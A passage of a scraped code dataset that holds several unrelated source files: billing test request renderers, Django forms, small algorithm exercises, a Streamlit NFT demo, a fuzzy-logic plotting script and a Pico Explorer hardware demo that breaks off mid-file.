request=sender_state.template,\n transaction_type=event.get('transaction_type', 'payment'),\n transaction_amount=event.get('transaction_amount')\n )\n raise LookupError(f'unknown endpoint for ProcessorBnplIncomeRenderer: {sender_state.endpoint}')\n\n def render_commission_request(\n self,\n st: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath = 'commission.json',\n transaction_type: str = 'payment',\n transaction_amount: tp.Optional[float] = None,\n ) -> loader.RenderedTemplate:\n if 
isinstance(request, str):\n request = self.loader.load_bnpl_income_request(request)\n event: dict[str, tp.Any] = request['event']\n\n self._update_event(st, event, contract_type)\n\n event['transaction_type'] = transaction_type\n\n if transaction_amount:\n event['transaction_amount'] = transaction_amount\n\n return request\n\n @staticmethod\n def _update_event(\n sender_state: 'state.PipelineState',\n event: dict[str, tp.Any],\n contract_type: type,\n ) -> None:\n event.update({\n 'billing_client_id': sender_state.client_id,\n 'billing_contract_id': sender_state.get_contract(contract_type).id,\n 'transaction_dt': formatted.shifted_date_iso(hours=-3),\n 'transaction_id': f'transaction_id-{sender_state.order_uid}-{event[\"transaction_type\"]}',\n })\n\n\nclass ProcessorTaxiLightRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n event = sender_state.event_params or {}\n if sender_state.endpoint == 'payout':\n return self.render_payout_request(\n st=sender_state,\n request=sender_state.template,\n operation_type=event.get('operation_type', 'INSERT_NETTING'),\n amount=event.get('amount')\n )\n raise LookupError(f'unknown endpoint for ProcessorTaxiLightRenderer: {sender_state.endpoint}')\n\n def render_payout_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n operation_type: str = 'INSERT_NETTING',\n amount: tp.Optional[float] = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_light_request(request)\n event = request['event']\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"id\": t_id,\n \"transaction_dt\": formatted.shifted_date_iso(hours=-2),\n \"client_id\": str(st.client_id),\n \"contract_id\": st.get_contract(contr.ServiceContract).id,\n \"invoice_external_id\": st.external_id,\n \"operation_type\": operation_type,\n })\n if amount is not None:\n event[\"amount\"] = amount\n return request\n\n\nclass ProcessorTrustRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n request = self.loader.load_trust_request(sender_state.template)\n\n request.update({\n 'namespace': sender_state.namespace,\n 'endpoint': sender_state.endpoint\n })\n\n self._update_event(request['event'], sender_state)\n return request\n\n def _update_event(self, event: dict[str, tp.Any], st: 'state.ExtendedPipelineState') -> None:\n dt = formatted.shifted_date_iso(hours=-4)\n\n event.update({\n 'dt': dt,\n 'postauth_dt': dt,\n 'payment_method_id': st.payment_method_id or event['payment_method_id'],\n 'currency': st.event_currency,\n 'service_id': st.service_id,\n })\n\n products_params = st.products_params or [{}]\n for params in products_params:\n params['partner_id'] = st.client_id\n params['service_id'] = st.service_id\n\n event['products'] = self.generate_products(products_params)\n\n for row in st.rows:\n row['dt'] = dt\n for refund in st.refunds:\n refund['dt'] = refund['payment_dt'] = dt\n\n event['rows'] = self.generate_rows(st.rows)\n if st.refunds:\n event['refunds'] = self.generate_refunds(st.refunds)\n\n @classmethod\n def generate_rows(cls, rows_params: list[dict]) -> list[dict]:\n return [\n deep_update(cls.generate_row(row_id=params.get('row_id')), params)\n for params in rows_params\n ]\n\n @classmethod\n def generate_refunds(cls, refunds_params: list[dict]) -> list[dict]:\n return [\n deep_update(cls.generate_refund(rows_params=params.get('rows', [])), params)\n 
for params in refunds_params\n ]\n\n @classmethod\n def generate_row(cls, row_id: tp.Optional[int]) -> dict:\n return {\n \"id\": row_id or rand.int64(),\n \"fiscal_nds\": \"nds_none\",\n \"fiscal_inn\": \"\",\n \"fiscal_title\": \"test_fiscal_title\",\n \"price\": 1200.15,\n \"order\": {\n \"contract_id\": None,\n \"commission_category\": None,\n \"update_dt\": \"2021-10-05T14:55:57+00:00\",\n \"service_product_id\": 786020877,\n \"price\": None,\n \"service_order_id_number\": 168366440,\n \"start_dt_utc\": None,\n \"service_product_external_id\": \"1626979513690-DTQA22CMFK-5877\",\n \"clid\": None,\n \"service_order_id\": \"168366439\",\n \"text\": None,\n \"start_dt_offset\": None,\n \"service_id\": 638,\n \"dt\": \"2021-10-05T14:55:57+00:00\",\n \"passport_id\": 4011632014,\n \"region_id\": None\n },\n \"amount\": 1200.15,\n \"fiscal_item_code\": \"\",\n \"fiscal_agent_type\": \"\",\n \"cancel_dt\": None,\n \"quantity\": 0.0\n }\n\n @classmethod\n def generate_refund(cls, rows_params: list[dict]) -> dict:\n return {\n \"resp_desc\": None,\n \"terminal_id\": None,\n \"trust_refund_id\": \"615c678a5b095cb6e55af28e\",\n \"currency\": \"RUB\",\n \"rows\": cls.generate_rows(rows_params=rows_params),\n \"is_reversal\": 0,\n \"payment_dt\": \"2021-10-05T14:56:12+00:00\",\n \"cancel_dt\": None,\n \"resp_dt\": None,\n \"description\": \"cancel payment\",\n \"dt\": \"2021-10-05T14:56:10+00:00\",\n \"refund_to\": \"paysys\",\n \"type\": \"REFUND\",\n \"amount\": 1200.15,\n \"resp_code\": \"success\",\n \"service_id\": 638,\n \"passport_id\": 4011632014\n }\n\n @classmethod\n def generate_products(cls, products_params: list[dict]) -> list[dict]:\n return [\n deep_update(cls.generate_product(product_id=params.get('row_id')), params)\n for params in products_params\n ]\n\n @classmethod\n def generate_product(cls, product_id: tp.Optional[int]) -> dict:\n return {\n \"id\": product_id or 786020877,\n \"partner_id\": 1351796565,\n \"product_type\": \"app\",\n \"name\": \"TestTestAppProduct\",\n \"package_name\": None,\n \"fiscal_title\": \"test_fiscal_title\",\n \"single_purchase\": None,\n \"subs_period\": None,\n \"parent_id\": None,\n \"active_until_dt\": None,\n \"service_fee\": None,\n \"fiscal_nds\": \"nds_20_120\",\n \"hidden\": None,\n \"external_id\": \"638076723262902886\",\n \"subs_trial_period\": None,\n \"inapp_name\": None,\n \"service_id\": 638\n }\n\n\nclass ProcessorOplataRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n event = sender_state.event_params or {}\n\n if sender_state.endpoint == 'cashless':\n event_type = event.get('type')\n\n if event_type == 'payment':\n return self.render_cashless_payment_request(\n sender_state=sender_state,\n contract_type=contr.OplataContract,\n request=sender_state.template,\n order_price=event.get('order_price'),\n commission=event.get('commission'),\n item_by_card=event.get('item_by_card'),\n item_by_promocode=event.get('item_by_promocode'),\n )\n\n if event_type == 'refund':\n return self.render_cashless_refund_request(\n sender_state=sender_state,\n contract_type=contr.OplataContract,\n request=sender_state.template,\n original_order_price=event.get('original_order_price'),\n refund_price=event.get('refund_price'),\n item_by_card=event.get('item_by_card'),\n item_by_promocode=event.get('item_by_promocode'),\n )\n\n raise LookupError(f'unknown \"cashless\" endpoint event type in ProcessorOplataRenderer: {event_type}')\n\n if sender_state.endpoint == 'payout':\n return 
self.render_payout_request(\n st=sender_state,\n request=sender_state.template,\n extended_params=event,\n )\n\n raise LookupError(f'unknown endpoint for ProcessorOplataRenderer: {sender_state.endpoint}')\n\n def render_payout_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_oplata_request(request)\n return self._render_payout_request(st, request, extended_params)\n\n def render_cashless_payment_request(\n self,\n sender_state: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath,\n order_price: float = None,\n commission: float = None,\n item_by_card: float = None,\n item_by_promocode: float = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_oplata_request(request)\n event: dict[str, tp.Any] = request['event']\n\n self._update_event_merchant(sender_state, event['merchant'], contract_type)\n self._update_event_order(\n sender_state,\n event['order'],\n price=order_price,\n commission=commission,\n item_by_card=item_by_card,\n item_by_promocode=item_by_promocode,\n )\n self._update_event_transaction(event['transaction'])\n\n return request\n\n def render_cashless_refund_request(\n self,\n sender_state: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath,\n original_order_price: float = None,\n refund_price: float = None,\n item_by_card: float = None,\n item_by_promocode: float = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_oplata_request(request)\n event: dict[str, tp.Any] = request['event']\n\n self._update_event_merchant(sender_state, event['merchant'], contract_type)\n self._update_event_order(\n sender_state,\n event['original_order'],\n price=original_order_price,\n item_by_card=item_by_card,\n item_by_promocode=item_by_promocode,\n )\n self._update_event_order(\n sender_state,\n event['refund'],\n refund=True,\n price=refund_price,\n item_by_card=item_by_card,\n item_by_promocode=item_by_promocode,\n )\n self._update_event_transaction(event['original_order_transaction'])\n\n return request\n\n @staticmethod\n def _update_event_merchant(\n sender_state: 'state.PipelineState',\n merchant: dict[str, tp.Any],\n contract_type: type,\n ) -> None:\n merchant.update({\n 'client_id': sender_state.client_id,\n 'contract_id': sender_state.get_contract(contract_type).id,\n })\n\n @staticmethod\n def _update_event_order(\n st: 'state.PipelineState',\n order: dict[str, tp.Any],\n refund: bool = False,\n price: float = None,\n commission: float = None,\n item_by_card: float = None,\n item_by_promocode: float = None,\n ) -> None:\n uid = st.refund_uid if refund else st.order_uid\n order_id = st.refund_id if refund else st.order_id\n\n order.update({\n 'uid': uid,\n 'order_id': order_id,\n 'created': formatted.shifted_date_iso(hours=-4),\n 'updated': formatted.shifted_date_iso(hours=-3),\n 'held_at': formatted.shifted_date_iso(hours=-3),\n 'pay_status_updated_at': formatted.shifted_date_iso(hours=-2),\n 'closed': formatted.shifted_date_iso(hours=-1),\n })\n\n if price is not None:\n order['price'] = price\n\n if commission is not None:\n order['commission'] = commission\n\n for item in order.get('items', []):\n without_markup = item_by_card is None and item_by_promocode is None\n item.update({\n 'total_price': price,\n 'markup': None if 
without_markup else {\n 'card': item_by_card,\n 'virtual::new_promocode': item_by_promocode,\n }\n })\n\n @staticmethod\n def _update_event_transaction(transaction: dict[str, tp.Any]) -> None:\n transaction.update({\n 'created': formatted.shifted_date_iso(hours=-4),\n 'updated': formatted.shifted_date_iso(hours=-3),\n })\n\n\nclass ProcessorActotronActRowsRenderer(BaseProcessorRenderer, ProcessorActotronActRowsRendererMixin):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n pass\n\n def render_acts_request(\n self,\n st: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath,\n namespace: str,\n act_sum_positive: float,\n act_sum_negative: float,\n act_sum_wo_vat_positive: float,\n act_sum_wo_vat_negative: float,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_actotron_act_rows_request(request)\n\n return super().render_acts_request(\n st=st,\n contract_type=contract_type,\n request=request,\n namespace=namespace,\n act_sum_positive=act_sum_positive,\n act_sum_negative=act_sum_negative,\n act_sum_wo_vat_positive=act_sum_wo_vat_positive,\n act_sum_wo_vat_negative=act_sum_wo_vat_negative\n )\n\n\nclass ProcessorTaxiRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n pass\n\n def render_stream_request(\n self,\n st: 'state.PipelineState',\n contract_type: type, # subclass of lib.contract.Contract\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n contract = st.get_contract(contract_type)\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event: dict[str, tp.Any] = request['event']\n amount = extended_params.get('amount') or event.get('amount')\n event['payload']['amount_details']['base_amount'] = str(abs(amount))\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"amount\": amount,\n \"client_id\": st.client_id,\n \"contract_id\": contract.id,\n \"due\": formatted.shifted_date_iso(hours=-3),\n \"event_time\": formatted.shifted_date_iso(seconds=-5),\n \"invoice_date\": formatted.shifted_date_iso(hours=-2),\n \"service_transaction_id\": st.service_transaction_id,\n \"transaction_id\": t_id,\n \"transaction_time\": formatted.shifted_date_iso(hours=-2),\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n def render_revenue_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event: dict[str, tp.Any] = request['event']\n amount = extended_params.get('amount') or event.get('amount')\n event['payload']['amount_details']['base_amount'] = amount\n event['payload']['contract_id'] = st.get_contract(contr.ServiceContract).id\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"amount\": amount,\n \"client_id\": st.client_id,\n \"contract_id\": st.get_contract(contr.ServiceContract).id,\n \"due\": formatted.shifted_date_iso(hours=-3),\n \"event_time\": formatted.shifted_date_iso(seconds=-5),\n \"invoice_date\": formatted.shifted_date_iso(hours=-2),\n \"orig_transaction_id\": t_id,\n \"service_transaction_id\": st.service_transaction_id,\n \"transaction_id\": t_id,\n \"transaction_time\": formatted.shifted_date_iso(hours=-2),\n })\n if extended_params:\n 
event.update(extended_params)\n return request\n\n def render_payout_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n return self._render_payout_request(st, request, extended_params)\n\n def render_fuel_hold_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event = request['event']\n amount = (extended_params or {}).get('amount') or event.get('amount')\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"amount\": amount,\n \"dt\": formatted.shifted_date_iso(seconds=-5),\n \"id\": rand.int64(),\n \"client_id\": st.client_id,\n \"contract_id\": st.get_contract(contr.ServiceContract).id,\n \"invoice_eid\": rand.uuid(),\n \"partner_id\": st.client_id,\n \"person_id\": st.person_id,\n \"transaction_id\": str(t_id),\n \"transaction_dt\": formatted.shifted_date_iso(hours=-1),\n \"total_sum\": amount,\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n def render_transfer_init_request(\n self,\n sender_state: 'state.PipelineState',\n receiver_state: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event = request['event']\n transaction_id = rand.uuid()\n sender_state.add_transactions([transaction_id])\n event.update({\n \"event_time\": formatted.date_iso(),\n \"recipient_billing_client_id\": receiver_state.client_id,\n \"recipient_billing_contract_id\": receiver_state.get_contract(contr.TransferContract).id,\n \"sender_billing_client_id\": sender_state.client_id,\n \"sender_billing_contract_id\": sender_state.get_contract(contr.ServiceContract).id,\n \"transaction_id\": transaction_id,\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n def render_transfer_cancel_request(\n self,\n sender_state: 'state.PipelineState',\n transaction_id: str,\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event = request['event']\n event.update({\n \"sender_billing_client_id\": sender_state.client_id,\n \"sender_billing_contract_id\": sender_state.get_contract(contr.ServiceContract).id,\n \"transaction_id\": transaction_id,\n })\n if extended_params:\n event.update(extended_params)\n return request\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/tests/lib/templates/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":28611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
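The taxi renderers above accept `extended_params: dict = None` but immediately call `.get` on the value, so the fixes fall back to an empty dict. A minimal standalone sketch of that `(extended_params or {})` idiom (function and data names are illustrative only, not part of the original module):

```python
# Hypothetical helper mirroring the amount lookup in the renderers above.
def pick_amount(extended_params, event):
    # Fall back to the event's own amount when no override dict is given.
    return (extended_params or {}).get('amount') or event.get('amount')

assert pick_amount(None, {'amount': 5}) == 5            # no overrides passed at all
assert pick_amount({'amount': 7}, {'amount': 5}) == 7   # explicit override wins
```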
+{"seq_id":"42913081065","text":"from django.contrib.auth.forms import UserCreationForm\r\nfrom django.contrib.auth.models import User\r\nfrom django import forms\r\nfrom ecommerce.models import Shop, Product, ProductCategory\r\nimport itertools\r\nfrom django.core.exceptions import ValidationError\r\nfrom django.forms import formset_factory, modelformset_factory\r\nfrom ecommerce.models import ProductImage\r\n\r\nclass UserRegisterForm(UserCreationForm):\r\n email = forms.EmailField()\r\n First_Name = forms.CharField()\r\n Last_Name = forms.CharField()\r\n contact = forms.CharField()\r\n Age = forms.IntegerField()\r\n\r\n class Meta:\r\n model = User\r\n fields = ['username', 'email', 'contact', 'Age', 'First_Name', 'Last_Name','password1', 'password2',]\r\n\r\n#allow users to register their shops. this will need to be restricted\r\nclass ShopForm(forms.ModelForm):\r\n class Meta:\r\n model = Shop\r\n fields = ['Shop_Name', 'Description', 'Street_Address', 'Suburb', 'City', 'ZipCode', 'Type', 'image']\r\n\r\n\r\nclass ProductForm(forms.ModelForm):\r\n category = forms.ModelChoiceField(queryset = ProductCategory.objects.all())\r\n class Meta:\r\n model = Product\r\n fields = ['Name', 'ProductType', 'Price', 'Description', 'category', 'Resale']\r\n\r\nclass ProductImageForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = ProductImage\r\n fields = ['AddImage', 'name', 'Stock', 'sizes']\r\n\r\nProductImageFormset = formset_factory(ProductImageForm, extra =1)\r\nUpdateImageFormset = modelformset_factory(ProductImage, fields = ('AddImage', 'name', 'Stock', 'sizes'))\r\n\r\nclass QuantityForm(forms.Form):\r\n quantity = quantity = forms.IntegerField(initial = 0, widget = forms.NumberInput(attrs = {'style': 'width:60px', 'size': '10'}))\r\n FormId = forms.IntegerField(widget = forms.HiddenInput(), required = False)\r\n ProductId = forms.IntegerField(widget = forms.HiddenInput(), required = False)\r\n\r\nclass CheckoutSignUpForm(UserCreationForm):\r\n email = forms.EmailField()\r\n contact = forms.IntegerField()\r\n\r\n class Meta:\r\n model = User\r\n fields = ['username', 'email', 'contact','password1', 'password2', ]\r\n","repo_name":"MobyDickIsAfrican/TingoVille","sub_path":"profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"31706393040","text":"def numSquares(n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n perfectSquares = [1]\n p = 2\n dp = [0]\n\n for i in range(1, n+1):\n if i >= p*p:\n perfectSquares.append(p*p)\n p += 1\n minNumber = dp[i-perfectSquares[0]] + 1\n for square in perfectSquares:\n minNumber = min(minNumber, dp[i-square] + 1)\n dp.append(minNumber)\n return dp[n]\n\nprint(numSquares(10))","repo_name":"callistusystan/algorithmsPractice","sub_path":"LeetCode/PerfectSquares.py","file_name":"PerfectSquares.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"10297586881","text":"\"\"\"\r\n /B--D--F\r\nA | |\r\n \\C--E--G\r\n\"\"\"\r\n\r\nadjacent = {\r\n \"A\": (\"B\", \"C\"),\r\n \"B\": (\"A\", \"C\", \"D\"),\r\n \"C\": (\"B\", \"E\"),\r\n \"D\": (\"B\", \"E\", \"F\"),\r\n \"E\": (\"C\", \"D\", \"G\"),\r\n \"F\": (\"D\",),\r\n \"G\": (\"E\",)\r\n}\r\n\r\ndef dfs_recursive(now, goal, path=[]):\r\n path += [now]\r\n if now == goal:\r\n print(path)\r\n\r\n for n in adjacent[now]:\r\n if n not in path:\r\n dfs_recursive(n, goal, path)\r\n path.pop(-1)\r\n\r\ndef dfs_all(vertex, path=[]):\r\n path += [vertex]\r\n\r\n for n in adjacent[vertex]:\r\n if n not in path:\r\n path = dfs_all(n, path)\r\n\r\n return path\r\n\r\ndef dfs_non_recursive(start):\r\n stack, path = [start], [] # stackは処理待ちリスト pathは通過済み頂点のリスト \r\n\r\n while stack:\r\n vertex = stack.pop() # remove xX*last*Xx item\r\n if vertex in path: # 通ったことがあるか\r\n continue\r\n path.append(vertex) # 通ってよし\r\n for n in adjacent[vertex]: # 次に進むところを探す\r\n stack.append(n)\r\n\r\n return path\r\n\r\ndef dfs_itr(start, goal):\r\n stack, path = [start], []\r\n while stack:\r\n vertex = stack.pop()\r\n if vertex not in path:\r\n path.append(vertex)\r\n\r\n if vertex == goal:\r\n print(path)\r\n\r\n for n in adjacent[vertex]:\r\n stack.append(n)\r\n\r\nif __name__ == \"__main__\":\r\n # dfs_recursive(\"A\", \"G\")\r\n # print(dfs_all(\"A\"))\r\n # print(dfs_non_recursive(\"A\"))\r\n dfs_itr(\"A\", \"G\")\r\n","repo_name":"sushidesu/practice","sub_path":"my_dfs_non_recursive.py","file_name":"my_dfs_non_recursive.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22340601286","text":"import os\nimport json\nimport streamlit as st\nimport nft\nfrom web3 import Web3\nfrom pathlib import Path\nfrom dotenv import load_dotenv\n\n################################################################################\n# Purchase NFT Artwork: Usecase of the customer who wishes to purchase NFT Token\n################################################################################\n\n# Load configuration settings related to Ganache URL and Solidity Contract ABI\nload_dotenv()\n\n# Define and connect a new Web3 provider\nw3 = Web3(Web3.HTTPProvider(os.getenv(\"WEB3_PROVIDER_URI\")))\n\n################################################################################\n# Contract Helper function:\n################################################################################\n\n\n@st.cache(allow_output_mutation=True)\ndef load_contract():\n\n # Load the contract ABI\n with open(Path('./contracts/compiled/artwork_abi.json')) as f:\n artwork_abi = json.load(f)\n\n contract_address = os.getenv(\"SMART_CONTRACT_ADDRESS\")\n\n # Load the contract\n contract = w3.eth.contract(\n address=contract_address,\n abi=artwork_abi\n )\n\n return contract\n\n# Tab settings\n# tabMain, tabAbout, tabHelp = st.tabs([\"Main\", \"About\", \"Help\"])\n\ncontract = load_contract()\n\n# Read accounts from Ganache instance\naccounts = w3.eth.accounts\n\n\n################################################################################\n# Purchase NFT Artwork\n################################################################################\nst.title('NFT LuckyBar')\nst.markdown(\"---\")\n\nst.markdown(\"## Purchase LuckyBar NFT\")\n\n# Use a streamlit component to get the address of the artwork buyer from the owner\nbuyer_address = st.selectbox(\"Your Wallet Address\", options=accounts)\n\n# Raffle names\noptions = ('Ice-cream', 'Chocolatebar', 'Golden-toilet', 'Something', 'Nothing')\nraffle_index = st.selectbox(\"Choose Your Raffle\", range(len(options)), format_func=lambda x: options[x])\n\nnft_uri_id = raffle_index + 1\n\nst.write(\"Raffle:\", options[raffle_index])\nst.write(\"Raffle Index:\", nft_uri_id)\n\n# Get the NFT URI from nft_store.csv\nartwork_uri = nft.nft_uri(nft_uri_id)\nst.write(artwork_uri)\n\n# Use a streamlit component to set the address of the luckybar\nluckybar_address = st.selectbox(\"LuckyBar Owner Address\", options=accounts)\n\n# st.write(buyer_address)\n\ntoken_amount = st.text_input(\"Raffle Token Price (Wei)\", \"100\")\n\nif st.button(\"Buy NFT Artwork\"):\n # Approve the buyer to transfer token from the NFT owner\n contract.functions.approve(\n buyer_address,\n 0 # TokenID: Make it dynamic to get from nft-stores\n ).call()\n st.write(\"Buyer approved\")\n \n # Use the transferFrom function to transfer the ownership of the nft token to the buyer\n contract.functions.transferFrom(\n luckybar_address,\n buyer_address,\n 0 # TokenID: Make it dynamic to get from nft-stores\n ).call()\n\n st.write(\"Transaction receipt mined\")\n st.balloons()\nst.markdown(\"---\")\n\n################################################################################\n# Display a Token\n################################################################################\n\nst.markdown(\"### Display Your Purchased Art Token\")\n\nselected_address = st.selectbox(\"Select Account\", options=accounts)\n\ntokens = contract.functions.balanceOf(selected_address).call()\nst.write(f\"This address owns {tokens} tokens\")\n\ntoken_id = st.selectbox(\"Artwork Tokens\", 
list(range(tokens)))\n\nif st.button(\"Display NFT URI\"):\n # Use the contract's `ownerOf` function to get the art token owner\n owner = contract.functions.ownerOf(token_id).call()\n\n st.write(f\"The token is registered to {owner}\")\n\n # Use the contract's `tokenURI` function to get the art token's URI\n token_uri = contract.functions.tokenURI(token_id).call()\n\n st.write(f\"The tokenURI is {token_uri}\")\n st.image(token_uri)\n\nst.markdown(\"---\")\n\n##########","repo_name":"Billie-LS/Lucky_Bar_NFT_menu_of_surprise","sub_path":"LuckyBar/lucky.py","file_name":"lucky.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
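The purchase handler above originally invoked `approve` and `transferFrom` with `.call()`; in web3.py, `.call()` only simulates the function locally and discards any state change, while `.transact()` submits a real transaction. A hedged sketch of the distinction (`contract`, `w3`, and the two account variables are placeholders taken from the snippet's context, not runnable without a chain):

```python
# Read-only query: .call() executes locally, costs no gas, changes nothing.
owner = contract.functions.ownerOf(0).call()

# State change: .transact() submits a transaction from the given account.
tx_hash = contract.functions.approve(buyer_address, 0).transact({'from': luckybar_address})
receipt = w3.eth.wait_for_transaction_receipt(tx_hash)  # name in web3.py v5+; v4 used waitForTransactionReceipt
```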
+{"seq_id":"31383001235","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n\nfrom fuzzy_fuss.rbs.rule_base_parser import RuleBaseParser\n\nfrom fuzzy_system import parser\n\nparser.add_argument('--var-indices', nargs=2, default=(0, 1), type=int,\n help=\"Indices of variables for the exhaustive check (in case there is more than 2)\")\nparser.add_argument('--var-grid-range', default=0.5, type=float,\n help=\"Portion of variable value defining the grid range\")\nparser.add_argument('--var-grid-size', default=25, type=int,\n help=\"Size of the grid (number of elements in the range)\")\nparsed_args = parser.parse_args()\n\n# parse the fuzzy rule base from the file\nruleset, measurements = RuleBaseParser().parse(parsed_args.filename)\n\nmeas_grid = {}\nfor variable, value in measurements.items():\n vr = parsed_args.var_grid_range * value\n meas_grid[variable] = np.linspace(value - vr, value + vr, parsed_args.var_grid_size)\n\n\nvar_names = tuple(meas_grid.keys())\ni = parsed_args.var_indices\nvar1 = var_names[i[0]]\nvar2 = var_names[i[1]]\n\nresults = np.zeros(2*(parsed_args.var_grid_size, ))\n\nprint(f\"Performing exhaustive check for {results.size} values...\")\nfor i1, val1 in enumerate(meas_grid[var1]):\n for i2, val2 in enumerate(meas_grid[var2]):\n results[i1, i2] = ruleset.evaluate(measurements={**measurements, var1: val1, var2: val2})\nprint(\"Done\")\n\nprint(f\"NaN values: {100*np.isnan(results).sum()/results.size:g}% of the grid\")\n\nx, y = np.meshgrid(meas_grid[var1], meas_grid[var2])\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\nax.plot_surface(x, y, results, rstride=1, cstride=1, cmap='viridis', vmax=np.nanmax(results), vmin=np.nanmin(results))\nax.set_xlabel(var1)\nax.set_ylabel(var2)\nax.set_zlabel(ruleset.conclusion_names[0])\nax.set_title(f\"Exhaustive rule base '{ruleset.name}' response analysis\")\nplt.show()\n","repo_name":"savetheginger/fuzzy-fuss","sub_path":"examples/exhaustive_check.py","file_name":"exhaustive_check.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4686023683","text":"import time\nimport picoexplorer as explorer\n\nwidth = explorer.get_width()\nheight = explorer.get_height()\n\ndisplay_buffer = bytearray(width * height * 2) # 2-bytes per pixel (RGB565)\nexplorer.init(display_buffer)\n\nexplorer.set_audio_pin(0)\n\ni = 1\n\nwhile True:\n explorer.set_pen(120, 40, 60)\n explorer.clear()\n\n adc0 = int(explorer.get_adc(0) * 120)\n adc1 = int(explorer.get_adc(1) * 120)\n adc2 = int(explorer.get_adc(2) * 120)\n\n explorer.set_pen(255, 255, 255)\n\n explorer.text(\"ADC0:\", 20, 20, 100)\n explorer.text(\"ADC1:\", 20, 40, 100)\n explorer.text(\"ADC2:\", 20, 60, 100)\n\n explorer.set_pen(adc0 * 2, 0, 0)\n explorer.circle(90 + adc0, 26, 10)\n\n explorer.set_pen(0, adc1 * 2, 0)\n explorer.circle(90 + adc1, 46, 10)\n\n explorer.set_pen(0, 0, adc2 * 2)\n explorer.circle(90 + adc2, 66, 10)\n\n # example for the on-board A/B/X/Y buttons\n if explorer.is_pressed(explorer.BUTTON_A):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Button A pressed\", 20, 110, 200)\n elif explorer.is_pressed(explorer.BUTTON_B):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Button B pressed\", 20, 110, 200)\n elif explorer.is_pressed(explorer.BUTTON_X) and explorer.is_pressed(explorer.BUTTON_Y):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Buttons X and Y pressed\", 20, 110, 200)\n elif explorer.is_pressed(explorer.BUTTON_X):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Button X pressed\", 20, 110, 200)\n elif explorer.is_pressed(explorer.BUTTON_Y):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Button Y pressed\", 20, 110, 200)\n else:\n # no button press was detected\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Plug a jumper wire from GP0 to AUDIO to hear noise!\", 20, 110, 200)\n\n explorer.set_tone(i)\n\n if i > 600:\n explorer.text(\"Motor 1: Forwards\", 20, 180, 200)\n explorer.set_motor(0, 0, 1)\n else:\n explorer.text(\"Motor 1: Backwards\", 20, 180, 200)\n explorer.set_motor(0, 1, 1)\n\n if i > 600:\n 